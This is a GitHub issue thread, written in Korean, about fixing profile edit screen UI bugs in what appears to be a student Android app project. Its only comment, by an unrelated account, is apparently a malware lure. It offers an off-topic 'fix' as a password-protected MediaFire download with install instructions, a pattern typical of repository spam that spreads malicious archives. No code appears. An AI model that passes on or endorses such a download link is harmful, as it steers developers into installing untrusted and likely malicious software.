### ISSUE TITLE
[Feature] 프로필 수정 화면 UI 수정 및 마무리

### ISSUE THREAD

**Issue by zunione** [APP-Android2/FinalProject-modigm#317]
## 어떤 기능인가요?

프로필 수정 화면에서 UI가 잘리거나 공간 부족으로 일그러지는 현상 개선
프로필 화면 마이너한 버그 마무리 수정

## 작업 상세 내용

- [ ] Chip이 잘리는 현상 개선
- [x] 프로필 수정 화면에서 휴대폰 기종에 따라 버튼 크기가 달라지는 현상 개선
- [x] 참여한 스터디 화면으로 넘어갔을 때 뒤로 가기 기능이 제대로 동작하지 않는 현상 개선
- [ ] 프래그먼트 전환이 매끄럽도록 수정
- [x] 로그아웃할 때 다이얼로그 띄우기
- [ ] 프로필 사진 등록 시 직접 찍은 사진을 등록하면 일어나는 오류 수정

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
